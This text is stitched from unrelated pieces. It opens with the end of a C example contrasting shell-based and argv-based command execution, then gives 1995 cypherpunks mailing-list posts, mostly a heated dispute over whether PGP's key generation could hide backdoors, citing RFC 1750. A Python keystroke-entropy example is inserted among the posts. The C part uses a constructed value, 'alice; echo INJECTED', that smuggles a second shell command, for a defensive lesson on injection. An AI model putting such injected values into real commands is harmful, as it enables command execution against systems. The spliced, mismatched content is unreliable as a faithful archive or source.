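/* Unsafe: the string is pasted into a command line for "sh -c", so the
 * shell decides which bytes are data and which are syntax. */
int run_with_shell(const char *user, char *out, size_t outlen)
{
    char cmd[256];
    char *argv[] = { "sh", "-c", cmd, NULL };
    int n = snprintf(cmd, sizeof cmd, "printf %%s %s", user);

    if (n < 0 || (size_t)n >= sizeof cmd)
        return -1;
    return run_capture(argv, out, outlen);
}

/* Safe: no shell. The string is one argv element of the target program,
 * so every character in it is valid and none of it is shell syntax. */
int run_without_shell(const char *user, char *out, size_t outlen)
{
    char *argv[] = { "printf", "%s", (char *)user, NULL };

    return run_capture(argv, out, outlen);
}

int main(void)
{
    const char *input = "alice; echo INJECTED";   /* constructed sample */
    char out[128];

    run_with_shell(input, out, sizeof out);
    printf("sh -c : [%s]\n", out);
    run_without_shell(input, out, sizeof out);
    printf("execvp: [%s]\n", out);
    printf("untainted? %d\n", is_untainted(input));
    return 0;
}
```

The positive-list check is only needed on the path where the string really has to cross into a parser; on the execvp path it is not what provides the safety.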




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Mon, 31 Jul 95 18:35:52 PDT
To: cman@communities.com
Subject: Re: U.S. Banks are not all that bad
Message-ID: <2925@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In message <v02120d01ac4219a2e38e@[199.2.22.120]> Douglas Barnes writes:
> 
...
> 
> I must say that I've had some absolutely amazingly bad experiences
> with banks in Asia, Mexico and Central America, so I'm a skeptic
> when it comes to assuming that non-US banks are light years better.

The U.K. banks make the U.S. look awfully good....

> Although I have no direct experience of European banking, I do know that
> the European banking industry, taken as a whole, is substantially
> behind the US banking industry in automation and efficiency. Most of

Oh yes oh yes oh yes...and I've banked with Lloyds on and off 
for 12 years...
> 
....
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mabidex1 <102415.404@CompuServe.com>
Date: Mon, 31 Jul 95 21:25:35 PDT
To: cypherpunks@toad.com
Subject: Info
Message-ID: <199508010425.AAA25683@dub-mail-svc-1.compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey guys,
    I know next to nothing on this sort of stuff, but I do have a friend 
that works at the phone company...I'm REALLY interested in learning the 
ins and outs of the trade... have any Ideas where I can start? what files 
I should read, etc...

                            I would appreciate your help...
                                 Mabidex  102415.404@Compuserve.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 1 Aug 95 01:27:20 PDT
To: Derek Atkins <warlord@ATHENA.MIT.EDU>
Subject: The Two Threads of Dr. Cohen
Message-ID: <v02120d0fac439bb79925@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



There are two threads to Dr. Cohen's arguments which bear
separation. One thread, with the implications of deliberate
wrongdoing on the part of Derek Atkins or others unnamed
should be dismissed out of hand. His comments regarding the
fundamental security properties of PGP and the burden of
proof for software security are right on target.

One has to draw the line somewhere with regard to what "they"
are out to do. PGP may have had weaknesses from the beginning,
but to suggest a deliberate change so subtle as to escape PGP's
original authors is to descend into the realm of paranoia.
In addition, such allegations are extremely rude, and I think
Dr. Cohen owes Derek an apology.

At the same time, I think some apologies are in order with
respect to some very good points raised by Dr. Cohen about
software security. There is a whole sub-discipline of CS
devoted to the construction of trusted computer systems, which
if practiced can result in much greater assurances about the
reliability and security of the resultant software. This is
(I believe) the source of Dr. Cohen's assertion that the
burden of proof is on those who claim something is secure.

PGP is practically a poster child for how not to write a secure
piece of software. It has had a great many authors. It is non-
modular. It is large and complex. Simplicity is almost always
sacrificed at the altar of even slight performance gains. It
is absolutely infested with platform-dependent code. And these
are only the problems that directly impact its security... it's
also strongly tied to a tty-style interface and implements a
poorly-designed format.

With respect to "tiger teaming" PGP, I think it is a pretty
hopeless proposition. It is never, ever going to be as secure
as some people would like it to be. Given the past and current
bug discovery rate, it is almost inconceivable that there are
not exploitable bugs. This is not to say it isn't "pretty good",
but it is not what someone with a formal background in real
secure systems development would ever bless as "secure".

PGP needs to be thrown away and rewritten from scratch. This
has, in fact, been done, but while this development effort has
been incrementally better, it still doesn't qualify as a
secure development approach. Also, nobody has this product yet
for reasons that I won't mention as we don't need to start
another tangential flamewar.

In any event, I think it's important for people to realize that
in the security community, the burden of proof _is_ on the
software developer, not on those claiming security problems.
I'm surprised Perry hasn't chimed in on this score yet, many
of his posts allude to similar notions of security by design
and by construction.

Doug






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Mon, 31 Jul 95 16:55:08 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199507312355.BAA22631@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


> Yesterday I heard in the radio that someone in America has developed
> some device which darkens the TV screen if there is sex or crime on TV.

> Does anyone know whether this is true and how it works?

It's called the 'Off' switch...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lindat@iquest.net (Dr. Linda D. Thompson - American Justice Federation)
Date: Tue, 1 Aug 95 00:13:03 PDT
To: aen!news@iquest.net
Subject: Software Glitch FYI
Message-ID: <m0sdBF0-001ehcC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


A Congressman's aide called me today to explain that if you send email to all
the Congressmen's offices at one time, the software at their end causes each
Congressman to receive 50 copies.

Please be sure everyone is aware of this glitch.

To prevent 50 copies from being sent to each Congressman, it is necessary to
break the mailing list into 5-10 addresses at a time.

Every list I've ever received of Congressional Emails has annoying spaces
and formats, so my list doesn't have that.  It can be copied directly into a
nickname box in Eudora or to a Bcc: list on a message.

============================================
Dr. Linda D. Thompson              
American Justice Federation                                               
3850 S. Emerson Avenue, Suite E,  Indianapolis, IN 46203
Telephone: (317) 780-5203      AEN News BBS: (317) 780-5211
Fax: (317) 780-5209                 Orders (Visa/MC) 1-800-749-9939    
Internet: lindat@iquest.net

*******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Mon, 31 Jul 95 23:59:00 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP?  NOT!
In-Reply-To: <9508010250.AA14743@all.net>
Message-ID: <199508010658.CAA18603@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


This might seem a bit long, and I'd like to apologize to the real
cypherpunks for my ranting.

> > Because you seem to be pointing a finger at specific people.  Your
> > recent messages imply (to me, at least) that you think one or more
> > members of the MIT PGP project may have deliberately tampered with
> > some of the PGP code.
> 
> I don't believe I actually said any such thing.  Perhaps you are not
> reading (or I am not writing) carefully enough.  All I think I did was
> ask why I should believe they have not when they or those like them have
> done it before. 

You have.  I doubt it was intentional, but you have, continually.
Here are some snippets of things you've said.  First, you say that it
is a rational concern since PGP was taken over by us:

> The term paranoid is inappropriate in this context.  Paranoia refers to
> an irrational fear, while I am expressing a rational concern over a
> system that has been taken over by a (partially) government funded
> university and which has not been properly verified.  The history of
> cryptography (as they say) is (quite literally) littered with the dead
> bodies of people killed because somebody else thought a cryptosystem was
> good enough when it was not. 

Then you talk about the MIT version as if it were the original thing:

> 	Why (specifically) do you think the MIT version of PGP has no
> backdoors and is not subject to attacks such as the one outlined in my
> previous posting?

PGP 2.0 was released in September, 1992, from Europe, and many many
people have been examining it ever since.  I truly believe that there
are no backdoors.  Does that mean the program is completely bug-free?
Hardly.  Does it mean that some attack against PGP won't be discovered
in the future?  I don't know, I'm not a diviner, I cannot foresee the
future, and I have no idea what technology will come in the future.
For all I know, someone will prove that P=NP and all this will be for
naught.

Anyways, to get back to my claims of your hurtful statements:

> Why (specifically) do you think so? Because you claim it? Because the
> MIT maintainer claims it? You say MIT is not associated with the NSA,
> but they have historically been funded by the NSA and other federal
> agencies for work on information security.  Do you really think that the
> only information protected by PGP is dirty pictures? Do you somehow
> think that MIT and the NSA are above that sort of thing? All you have to
> do is look at history, and it should be clear that this appeal to
> authority is often used by those trying to cover things up.  If you know

I DO NOT GET PAID FOR ANY WORK I DO ON PGP!  I HAVE NEVER RECEIVED A
DIME FOR MY WORK.  I WORK ON PGP BECAUSE I BELIEVE IN IT.  Having said
that, I cannot BELIEVE you would have the Balls to say that the NSA
has bought me.  Go re-read what you've said.  You have just said that
the MIT PGP team, through MIT, is bound to be covering something up
because of historical fact.  

I have never said "Believe me when I said PGP is secure".  I have
continually asked for you to check on the security yourself.  But you
have continually refused to do that, and asked why it is secure!  So,
you refuse to look for yourself, and you refuse to believe it when you
are told.  So, what the hell do you want?  Do you want a line-by-line
examination of the code????  Sheesh!

> It cannot be safely assumed that any program is clean or that any one
> person or group is not involved with intentionally subverting security.
> That violates the fundamental principles of information protection.

You're right, which is why the source code is publicly available.  I
would wholeheartedly agree with you if only binaries are shipped, but
the source is available.  Anyone can look through and verify the code.
Anyone can try to find weaknesses.  In fact, everyone is encouraged to
do so.  I don't see how _this_ "violates the fundamental principles of
information protection".

> You might be, but even if you are not, that doesn't mean there are no
> back doors.  Your inability to detect a backdoor gives me little
> confidence, since this is at least an NP-complete problem and, with all
> due respect, today, nobody can prove that PGP is free of backdoors

I think I've finally figured out where you are completely confused!!!
You are confusing "back door" with "bug".  FYI: A back door is usually
a means to make it easy for someone to get into a system.  For
example, if I put in code so that I could read every PGP message by
typing the passphrase "Setec Astronomy", that would be a backdoor.
The fact that httpd was exploitable, or sendmail holes, or etc. are
BUGS, not Back doors.

Your problem is that you are using these terms interchangeably.  THEY
ARE NOT THE SAME.  Putting in a backdoor has the connotation of
intent.  A bug is an accidental occurrence that was a side effect of
poor coding, a typo, carelessness, confusion, inconsistency, etc.  A
back door, on the other hand, is a DELIBERATE ATTEMPT TO REDUCE OR
CIRCUMVENT SECURITY!

> "...Choosing random quantities to foil a resourceful and motivated
> adversary is surprisingly difficult.  ...recommends the use of truly
> random hardware techniques and shows that the existing hardware on many
> systems can be used for this purpose."
> 
> PGP does not use "truly random hardware techniques"

Oh?  It doesn't?  How can you say that?  In what way does it not do
this?  The RFC states, in your quote, that "existing hardware on many
systems can be used" for truly random hardware techniques.  Please,
substantiate your claim that PGP does not do this.  Show me code
segments which show it does not.  Show me an analysis that goes
contrary to the RFC.

> But the RFC acknowledges that these methods are highly suspect and should
> not be trusted.

You're right, it should not be blindly trusted.  Go read the code and
examine the algorithms to prove to yourself that it is secure.  I've
done that to the extent that I wish, and I believe it is secure.  But
you won't take my word for it, so go ahead and check!  Oh, wait, you
won't do that either.  Sorry.  I forgot.

> How is it "unscholarly, unprofessional, needlessly personal, and just
> plain insulting" to question the idea that hundreds of thousands of
> people are trusting their freedom to software that is probably not
> secure? I think it is highly unprofessional to try to claim that PGP is
> secure and to try to bolster that position by claiming that some
> "Request for Comments" supports it when that same said RFC refutes it.

Show me some proof that PGP is "probably not secure"?  Come on, there
is a finite probability that I can walk through a wall!  The laws of
quantum probability give me this finite probability!  But I'd be hard
pressed to show you that I can walk through the wall.  It looks good
on paper, but it just ain't gonna happen.

As for the RFC, it does not refute that PGP is secure.  In fact, PGP
pretty much follows the RFC's guidelines.  You clearly have selective
reading.  A useful skill -- I should learn it.

> It has been my general impression that "scholarly" means, among other
> things, questioning the status quo and finding out where the generally
> accepted ideas break down.  I am a professional in the field of
> information protection, and I consider it highly unprofessional in this
> field to assume that systems are secure without ample evidence to
> support it.

Don't forget that you have to run PGP in some OS.  Please show me a
secure OS!  Given that the OS cannot be secure (using your logic it is
intuitively obvious that this is true) then how can you ask to see a
program any more secure than the environment in which it runs?  PGP
tries to be as secure as possible given the environment in which it is
being run.

> So far, I see no ample evidence to support the security of PGP's key
> generation algorithm relative to the concerns I have expressed.  Those
> concerns are fairly specific as far as I am concerned, but if you feel I
> have to demonstrate a specific attack that works in order to question
> the adequacy of protection, I think you have it backwards.

No, your concerns have been utterly vague.  The closest you've come to
being at all specific is some vague notion of analyzing keystrokes.
In every message I've responded to, I've asked you to expand upon what
you mean.  What kind of analysis do you mean?  How do you propose to
analyze keystroke timings?  Even if you have a probabilistic model of
keystroke timings, all you can possibly do is compare two different
probabilities to see if they are the same.  But that doesn't help you
limit the search on keys.

> If the people at MIT feel personally insulted because I have questioned
> their previously accepted ideas, it's just too bad.  I didn't say they

I'm not insulted that you are questioning PGP.  I am insulted because
in every message you have sent, you have postulated some conspiracy
with the government or postulated some intentional weakening of PGP.
Your statements could almost be construed as libelous, which is why I
feel insulted.  I feel extremely comfortable with people questioning
the security of PGP.  What I don't like is someone stating that it is
not secure, claiming some sort of back door (which connotes some
intent to reduce the security) and does not back up the claim with any
proof.

> 	In my case, I question its security and have given at least one
> 	example of how it could be insecure.

And I've asked you to explain your conjecture, which you have
constantly either refused to do or intentionally ignored.

> 	If you do believe it is secure, you should be able to support
> 	your contention with more than reference to RFCs, vague
> 	comments, and claiming that you have read the code and didn't
> 	catch anything.

No matter what, PGP's security is based upon the security of RSA,
which in turn is based upon the difficulty of factoring, which has
never been proven to be hard.  Therefore, there is always the
possibility that someone will find a polynomial factoring algorithm
which would completely destroy any security in PGP.

> 	If you cannot specifically address my question, say so, tell us
> 	all that the security of PGP is an open question, and either
> 	leave it open or go after closing it.

Ok.  Please explain what kind of keystroke timing analysis you
propose, and I will attempt to answer that, or concede your point.

> 	OR come up with another alternative that doesn't ignore my question,
> 	doesn't avoid the issue, doesn't appeal to authority that fails to
> 	adequately support your contentions, and doesn't claim that I am
> 	somehow unprofessional or scholarly for questioning an unproven
> 	contention.

Have you heard the thought experiment of putting a back-door in login
by modifying the C compiler to modify the C compiler to modify login?
Think about that in terms of the security of PGP -- you are always
going to be limited in security to the security of the system on which
you are running.

I only believe you are being unscholarly because you are making claims
without any supporting evidence.  _THAT_ is unscholarly!  

Now, if you are asking if PGP is completely bug free, I will be the
first to admit that it is not.  I am certain that there are latent
bugs in the code (and there are many that have been fixed since the
2.6.2 release).  However that has not been your statement nor your
questions.  You have asked about back doors, an intentional act to
reduce the security, and to that I vehemently say that there are none.

How do I know that you haven't been infected by a computer virus?
Perhaps there was a computer virus that flashed subliminal messages on
your screen to make you think you were L. Detweiler and think that
Desert Storm was the greatest thing since sliced bread?  Improbable?
Perhaps, but prove to me that this didn't happen!  How do you know
that Microsoft Windows doesn't send all your keystrokes to Bill Gates
for him to peruse?  Prove to me that we landed on the moon!  Some have
contended that it was all a hoax.  Prove to me that the universe
existed before I was conscious of it.  How do I know that you exist?
Perhaps all this is a dream -- and if so, I sure hope to god I wake up
soon.

Good night.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 1 Aug 95 01:21:38 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: a hole in PGP
In-Reply-To: <9508010049.AA05263@all.net>
Message-ID: <9508010821.AA20913@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[NB: Due to some as-yet-undiagnosed bugs in my .procmailrc, I apparently
sent all my mail received between sometime Saturday and about 17:00 PT Monday
straight into the bit bucket. *sigh*  Archives are a Good Thing. If you
sent me mail during that approximate period, please contact me again. Thanks.]

Dr. Frederick B. Cohen writes:
> Request for Comments: 1750 - Randomness Recommendations for Security
> 
> "...Choosing random quantities to foil a resourceful and motivated
> adversary is surprisingly difficult. ...recommends the use of truly
> random hardware techniques and shows that the existing hardware on many
> systems can be used for this purpose."
> 
> PGP does not use "truly random hardware techniques"

Correct. However, the excerpt of RFC 1750 you quoted above does not claim
that all PRNG techniques are unreasonably insecure, nor does it suggest that
they should never be used.

> "...For the present, the lack of generally available facilities for
> generating such unpredictable numbers is an open wound in the design of
> cryptographic software. ... the only safe strategy so far has been to
> force the local installation to supply a suitable routine to generate
> random numbers. To say the least, this is an awkward, error-prone and
> unpalatable solution." - 1994 - after PGP was implemented.

I agree with the RFC's authors that mandating provision of platform-
dependent routines is an awkward and unappealing strategy. Note, however,
that they characterize it as "the only safe strategy". They say that the
_strategy_ is error-prone; they do not say that all locally-supplied
routines are unreasonably insecure, and should not be used.   

> and then: "This informational document suggests techniques for producing
> random quantities that will be resistant to such attack. It recommends
> that future systems include hardware random number generation or provide
> access to existing hardware that can be used for this purpose."

This is just a reiteration of the first section you quoted.

> So I guess the RFC supports my contention and not [Derek Atkins'].
[...]
[re: PGP's key generation methods]
> But the RFC acknowledges that these methods are highly suspect and should
> not be trusted.

Where ?  Give a citation, please. It doesn't say anything of the sort in
the part you quoted previously. Furthermore, you inexplicably omitted all
mentions of keystroke-timing PRNG techniques in RFC 1750. Here are some
excerpts that strike me as particularly germane to the quality of the
randomness in PGP:

------------------------------------------------------------------------
4.2 Timing and Content of External Events

   It is possible to measure the timing and content of mouse movement,
   key strokes, and similar user events.  This is a reasonable source of
   unguessable data with some qualifications. On some machines, inputs
   such as key strokes are buffered.  Even though the user's inter-
   keystroke timing may have sufficient variation and unpredictability,
   there might not be an easy way to access that variation.  Another
   problem is that no standard method exists to sample timing details.
   This makes it hard to build standard software intended for
   distribution to a large range of machines based on this technique.

   The amount of mouse movement or the keys actually hit are usually
   easier to access than timings but may yield less unpredictability as
   the user may provide highly repetitive input.
[...]
6.2 Non-Hardware Sources of Randomness

   The best source of input for mixing would be a hardware randomness
   such as disk drive timing affected by air turbulence, audio input
   with thermal noise, or radioactive decay.  However, if that is not
   available there are other possibilities.  These include system
   clocks, system or input/output buffers, user/system/hardware/network
   serial numbers and/or addresses and timing, and user input.
   Unfortunately, any of these sources can produce limited or
   predictable values under some circumstances.
[...]
   The use of multiple random inputs with a strong mixing function is
   recommended and can overcome weakness in any particular input.  For
   example, the timing and content of requested "random" user keystrokes
   can yield hundreds of random bits but conservative assumptions need
   to be made.  For example, assuming a few bits of randomness if the
   inter-keystroke interval is unique in the sequence up to that point
   and a similar assumption if the key hit is unique but assuming that
   no bits of randomness are present in the initial key value or if the
   timing or key value duplicate previous values.  The results of mixing
   these timings and characters typed could be further combined with
   clock values and other inputs.

   This strategy may make practical portable code to produce good random
   numbers for security even if some of the inputs are very weak on some
   of the target systems.  However, it may still fail against a high
   grade attack on small single user systems, especially if the
   adversary has ever been able to observe the generation process in the
   past.  A hardware based random source is still preferable.
-------------------------------------------------------------------------

I find it difficult to reconcile your claim that "the RFC acknowledges
that these methods are highly suspect and should not be trusted" with the
RFC's assertions that:

	"the timing and content of [...] key strokes [...] is a reasonable
	 source of unguessable data"

	"the timing and content of requested `random' user keystrokes can
	 yield hundreds of random bits"

	"this strategy may make practical portable code to produce good
	 random numbers for security"

etc. 

Having said that, allow me to state my position on some of the other
issues you've raised. I do not _know_ nor can I _prove_ that PGP has
no cryptographic backdoors. I happen to _believe_ that it does not --
among other things, I have met Derek Atkins and Jeff Schiller, and I
trust them in this regard. I don't consider that any reason for you to
believe that it's backdoor-free. In fact, I'm not interested in trying to
persuade you or anyone else that it is backdoor-free. By the same token,
I don't see any reason for anyone here to heed your demands that they
justify _their beliefs_ to _your satisfaction_. 

I remain rather baffled as to your motives in this mini-campaign. You said
that no-one can prove PGP has no backdoors, and many here essentially said
"what else is new ?". In the white paper about your small "secure" HTTP daemon,
thttpd, (found at http://all.net/ManAl/white/whitepaper.html, to save you the
trouble of more self-promotion ;), it says:

> Proof of program correctness to verify even simple security
> properties, for example, grows almost exponentially with the number of 
> program statements. Verifying a 100 line limited-language program for the
> simple security properties associated with the Bell-LaPadula model of
> security takes about 24 hours of CPU time on a Cray supercomputer. The 
> source code for the NCSA W3 server in widespread use today is about 6600
> lines long, so there is no computer around today that is likely to be able
> to verify its security (or more likely demonstrate its insecurity).

If we adopt this standard, it seems hopeless to "verify" the PGP source, as
others have noted here. [BTW, I read your detailed code walkthrough for
thttp with interest, and commend your work on that. I'm planning some
sort of similar review for a larger piece of code, and it's encouraging
to see other people pulling it off.]

Nobody has suggested a serious, better-understood alternative to PGP as it
is used today (except maybe 2.6.2ui (?), the current int'l. version, for
merely MIT-allergic people :)

So, in summary, we effectively can't know for sure that PGP is secure, but as
a practical matter we have no choice but to accept it, albeit with varying
degrees of caution. This is hardly novel. Did you have a point I missed
somewhere ?  Your good stuff tends to get lost in your rhetoric,
recriminations, and advertising....

[On a largely unrelated note, why does http://all.net/admin/usepolicy.html
contain the following warning ?  Specifically, why the age limit ?

	"This service is ONLY for use by legally competent adults human [sic]
	 individuals of age 18 or older. If you do not meet these criteria, 
	 you should immediately cease and desist your use of this service."]

-Futplex <futplex@pseudonym.com>

"...because of Dr. Cohen's frequent, blatant, and intentional disregard for
 the guidelines that this list operates under, and because of his apparent
 disregard for the frequently expressed opinions of many of the members of
 this list that they don't appreciate his antics, I've configured Majordomo 
 to divert all messages he posts to Firewalls to the list owner for review 
 and approval before posting..." -Brent Chapman, July 24, 1995
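
The conservative accounting quoted above from RFC 1750 section 6.2, worked through as an added example (not code from PGP, the RFC or anyone in this thread). The 2-bit credit for "a few bits", SHA-256 as the "strong mixing function", the choice to credit the first interval, and the sample keystrokes are all assumptions made for illustration.

```python
import hashlib
import struct

# Assumption: the RFC says "a few bits" per novel value; 2 is used here.
BITS_PER_NOVEL_VALUE = 2

# Constructed samples: (inter-keystroke interval in timer ticks, key typed).
VARIED = [(1843, "q"), (2210, "z"), (977, "m"), (3105, "p"), (1502, "a"), (2764, "x")]
REPETITIVE = [(1000, "a")] * 6                        # user holds one key down
BUFFERED = [(0, "q"), (0, "z"), (0, "m"), (0, "p")]   # buffered input hides timing


class KeystrokePool:
    """Mixes keystroke events and keeps a conservative entropy estimate."""

    def __init__(self, required_bits=128):
        if not 0 < required_bits <= 256:
            raise ValueError("a SHA-256 digest cannot carry more than 256 bits")
        self.required_bits = required_bits
        self.estimated_bits = 0
        self._mixer = hashlib.sha256()   # stand-in strong mixing function
        self._seen_intervals = set()
        self._seen_keys = set()
        self._events = 0

    def add(self, interval_ticks, key):
        """Mix one event into the pool and return the bits credited for it."""
        # Every event is mixed in, including those credited with zero bits.
        self._mixer.update(struct.pack(">QI", interval_ticks, ord(key)))
        credited = 0
        # Timing counts only if this interval has not been seen before.
        if interval_ticks not in self._seen_intervals:
            credited += BITS_PER_NOVEL_VALUE
        # Key value counts only if it is new, and never for the initial key.
        if self._events > 0 and key not in self._seen_keys:
            credited += BITS_PER_NOVEL_VALUE
        self._seen_intervals.add(interval_ticks)
        self._seen_keys.add(key)
        self._events += 1
        self.estimated_bits += credited
        return credited

    def mix_extra(self, data):
        """Mix clock values or other inputs; they are credited with nothing."""
        self._mixer.update(data)

    def ready(self):
        return self.estimated_bits >= self.required_bits

    def seed(self):
        """Return the mixed pool, refusing while the estimate is too low."""
        if not self.ready():
            raise ValueError(
                "only %d of %d bits credited" % (self.estimated_bits, self.required_bits)
            )
        return self._mixer.copy().digest()


def estimate_bits(events):
    """Conservative estimate for a whole sequence of (interval, key) events."""
    pool = KeystrokePool()
    for interval_ticks, key in events:
        pool.add(interval_ticks, key)
    return pool.estimated_bits


if __name__ == "__main__":
    for name, events in (("varied", VARIED), ("repetitive", REPETITIVE),
                         ("buffered", BUFFERED)):
        print("%-10s %2d events -> %2d bits credited"
              % (name, len(events), estimate_bits(events)))
```

The repetitive and buffered samples show the qualifications in sections 4.2 and 6.2: the same number of keystrokes earns far less credit when keys repeat or when buffering flattens the timings.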



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 1 Aug 95 02:01:03 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: a hole in PGP?  NOT!
In-Reply-To: <199508010658.CAA18603@charon.MIT.EDU>
Message-ID: <9508010900.AA21295@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


RFC 1750 says:
# "...Choosing random quantities to foil a resourceful and motivated
# adversary is surprisingly difficult.  ...recommends the use of truly
# random hardware techniques and shows that the existing hardware on many
# systems can be used for this purpose."

Dr. Frederick B. Cohen writes:
$ PGP does not use "truly random hardware techniques"

I wrote:
% Correct.

Derek Atkins writes:
> Oh?  It doesn't?  How can you say that?  In what way does it not do
> this?  The RFC states, in your quote, that "existing hardware on many
> systems can be used" for truly random hardware techniques.  Please,
> substantiate your claim that PGP does not do this.  Show me code
> segments which show it does not.  Show me an analysis that goes
> contrary to the RFC.

Warning: I'm about to quibble over semantics. I'm not being accused of being
a NSA lackey (yet), so I guess I have more time for pettiness ;)

In the context of RFC 1750, it appears to me that the phrase "truly random
hardware techniques" does not refer to the type of RNG method employed in
PGP. Section 5.3 discusses the use of built-in digitizers of analog natural
sources, and turbulence in disk drive chambers, as the "truly random" 
"existing hardware" techniques. Keystroke timing only seems to fall under
6.2, Non-Hardware Sources of Randomness.

-----------------------------------------------------------------------
5.3 Existing Hardware Can Be Used For Randomness

   As described below, many computers come with hardware that can, with
   care, be used to generate truly random quantities.

5.3.1 Using Existing Sound/Video Input
[...]
5.3.2 Using Existing Disk Drives
[...]
-----------------------------------------------------------------------
6.2 Non-Hardware Sources of Randomness

   The best source of input for mixing would be a hardware randomness
   such as disk drive timing affected by air turbulence, audio input
   with thermal noise, or radioactive decay.  However, if that is not
   available there are other possibilities.  These include system
   clocks, system or input/output buffers, user/system/hardware/network
   serial numbers and/or addresses and timing, and user input. 
-----------------------------------------------------------------------

-Futplex <futplex@pseudonym.com>
"We love our lovin' -- but not like we love our freedom" -Joni Mitchell



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 1 Aug 95 03:18:50 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: a hole in PGP
In-Reply-To: <9508010008.AA02790@all.net>
Message-ID: <Pine.SUN.3.91.950801061213.9088A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:

> Why (specifically) do you think so? Because you claim it? Because the
> MIT maintainer claims it? You say MIT is not associated with the NSA,
> but they have historically been funded by the NSA and other federal
> agencies for work on information security.  Do you really think that the

Of course MIT was in the NSA's pocket back in 1978 when they mailed me 
and 3,000 other people a copy of "A Proposal for a Public Key Encryption 
System" and started this whole Public Key-Private Key thing.  It was all 
part of a plot.  If they hadn't done that we might all be using stronger 
systems today.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Tue, 1 Aug 95 05:19:20 PDT
To: nzook@bga.com
Subject: OS noise  [Was: a hole in PGP]
In-Reply-To: <Pine.3.89.9507312331.E21268-0100000@jake.bga.com>
Message-ID: <199508011214.AA17761@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Nathan, I know about the Amiga's small OS; I have used them on and
off over the years and recently acquired a non-functional one that
I had repaired; it's at the repair shop in Houston, waiting for the
next time I'm able to go to Houston and pick it up.

I really didn't want to start an OS holy war, although personally my
recent experiences with Windows incline me towards joining the Linux
Inquisition.

Our main weapon is fear, fear and surprise! Our _two_ main weapons are
fear, surprise, and an almost fanatical devotion to the principles of
K & R C. OUR THREE main weapons are...

Hmm. Maybe I should come in again...

+----------------+Quote from _Infinite In All Directions_, F.J. Dyson-----+
| Phil Fraering / \"The English Hierarchy, if there be anything unsound in|
| pgf@tyrell.net\ /its constitution, has reason to tremble even at an air |
+----------------+-pump or an electrical machine."---Joseph Priestly------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Otto <dave@dvorak.jta.edd.ca.gov>
Date: Tue, 1 Aug 95 07:26:19 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9508010008.AA02790@all.net>
Message-ID: <199508011426.HAA01105@dvorak.jta.edd.ca.gov>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 04:54:41 PDT
To: warlord@ATHENA.MIT.EDU (Derek Atkins)
Subject: Re: a hole in PGP?  NOT!
In-Reply-To: <199508010658.CAA18603@charon.MIT.EDU>
Message-ID: <9508011148.AA15766@all.net>
MIME-Version: 1.0
Content-Type: text


Sorry for the long reply.  I hope this will be taken off-line soon.

...
> Here are some snippets of things you've said.  First, you say that it
> is a rational concern since PGP was taken over by us:
> 
> > The term paranoid is inappropriate in this context.  Paranoia refers to
> > an irrational fear, while I am expressing a rational concern over a
> > system that has been taken over by a (partially) government funded
> > university and which has not been properly verified.  The history of
> > cryptography (as they say) is (quite literally) littered with the dead
> > bodies of people killed because somebody else thought a cryptosystem was
> > good enough when it was not. 

This is a true statement.  Tens of thousands of people have died because
cryptosystems were trusted when they should not have been (hindsight
being 20/20 of course). 

> Then you talk about the MIT version as if it were the original thing:
> 
> > 	Why (specifically) do you think the MIT version of PGP has no
> > backdoors and is not subject to attacks such as the one outlined in my
> > previous posting?
> 
> PGP 2.0 was released in September, 1992, from Europe, and many many
> people have been examining it ever since.  I truly believe that there
> are no backdoors.

So you believe that there are no backdoors because it was released from
Europe and people have looked at it since.

...
> 
> Anyways, to get back to my claims of your hurtful statements:
> 
> > Why (specifically) do you think so? Because you claim it? Because the
> > MIT maintainer claims it? You say MIT is not associated with the NSA,
> > but they have historically been funded by the NSA and other federal
> > agencies for work on information security.  Do you really think that the
> > only information protected by PGP is dirty pictures? Do you somehow
